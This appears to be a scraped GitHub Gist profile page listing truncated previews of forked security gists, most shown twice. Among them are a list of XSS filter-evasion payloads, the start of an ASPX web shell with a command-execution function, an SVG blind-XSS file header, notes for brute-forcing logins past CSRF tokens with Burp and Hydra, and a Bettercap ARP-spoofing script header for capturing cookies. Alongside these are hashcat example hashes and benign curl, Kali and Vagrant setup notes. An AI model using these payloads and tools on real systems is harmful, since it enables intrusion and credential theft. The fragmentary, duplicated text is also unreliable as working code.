Christopher CalfCrusher

## hash_examples.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / hash_examples.md
            
            
              Created
              May 2, 2023 21:57
                — forked from dwallraff/hash_examples.md
            
              
                Hashcat hash types - https://hashcat.net/wiki/doku.php?id=example_hashes
              
          
Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat


Hash-Mode
Hash-Name
Example


0
MD5
8743b52063cd84097a65d1633f5c74f5


10
md5($pass.$salt)
01dfae6e5d4d90d9892622325959afbe:7050461


## tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
  Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
  and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
  Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing

## kali-headless.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / kali-headless.md
            
            
              Created
              January 27, 2023 22:32
                — forked from xErik/kali-headless.md
            
              
                Configuring Headless (no X, GUI) Kali, Running In VirtualBox
              
          
    Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot


## ping.aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">

void Page_Load(object sender, EventArgs e){
}

string ExcuteCmd(string arg){
	ProcessStartInfo psi = new ProcessStartInfo();

## gist:55e1505e027b48dc5de41e9f65a8069b
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

## xss-image.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / xss-image.svg
            
            
              Created
              January 10, 2023 14:38
                — forked from rudSarkar/xss-image.svg
            
              
                SVG Image XSS File
              
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">

## responder-n-cookies.js
// Code mashed together from here: https://github.com/bettercap/caplets/
// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
//
// net.probe on
// sleep 1
// net.probe off
// set arp.spoof.targets <TARGETS>
// set https.proxy.script /root/caplets/responder-n-cookies.js
// set http.proxy.script /root/caplets/responder-n-cookies.js
// https.proxy on

## curl.md

      
              5 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / curl.md
            
            
              Created
              November 10, 2022 08:48
                — forked from subfuzion/curl.md
            
              
                curl POST examples
              
          
    Common Options

-#, --progress-bar
Make curl display a simple progress bar instead of the more informational standard meter.
-b, --cookie <name=data>
Supply cookie with request. If no =, then specifies the cookie file to use (see -c).
-c, --cookie-jar <file name>
File to save response cookies to.

  
## Vagrant OSX Setup

Vagrant

Create and configure lightweight, reproducible, and portable development environments. Vagrant is an amazing tool for managing virtual machines via a simple to use command line interface.
Before you start

In order to simplify the installation process you should install homebrew-cask which provides a friendly homebrew-style CLI workflow for the administration of Mac applications distributed as binaries. Refer to this article in order to install homebrew-cask.
Install

Vagrant uses Virtualbox to manage the virtual dependencies. You can directly download virtualbox and install or use homebrew for it.
Hash-Mode	Hash-Name	Example
0	MD5	8743b52063cd84097a65d1633f5c74f5
10	md5($pass.$salt)	01dfae6e5d4d90d9892622325959afbe:7050461
	## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
	# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	## Burp csrf-rewritting macro
	- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
	Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
	and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
	Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
	- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
	<%@ Page Language="C#" Debug="true" Trace="false" %>
	<%@ Import Namespace="System.Diagnostics" %>
	<%@ Import Namespace="System.IO" %>
	<script Language="c#" runat="server">

	void Page_Load(object sender, EventArgs e){
	}

	string ExcuteCmd(string arg){
	ProcessStartInfo psi = new ProcessStartInfo();
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>
	<?xml version="1.0" standalone="no"?>
	<!DOCTYPE svg PUBLIC
	"-//W3C//DTD SVG 1.1//EN"
	"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
	<svg width="200"
	height="200"
	zoomAndPan="disable"
	xmlns="http://www.w3.org/2000/svg"
	xmlns:xlink="http://www.w3.org/1999/xlink"
	xml:space="preserve">
	// Code mashed together from here: https://github.com/bettercap/caplets/
	// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
	//
	// net.probe on
	// sleep 1
	// net.probe off
	// set arp.spoof.targets <TARGETS>
	// set https.proxy.script /root/caplets/responder-n-cookies.js
	// set http.proxy.script /root/caplets/responder-n-cookies.js
	// https.proxy on

	Vagrant

	Create and configure lightweight, reproducible, and portable development environments. Vagrant is an amazing tool for managing virtual machines via a simple to use command line interface.
	Before you start

	In order to simplify the installation process you should install homebrew-cask which provides a friendly homebrew-style CLI workflow for the administration of Mac applications distributed as binaries. Refer to this article in order to install homebrew-cask.
	Install

	Vagrant uses Virtualbox to manage the virtual dependencies. You can directly download virtualbox and install or use homebrew for it.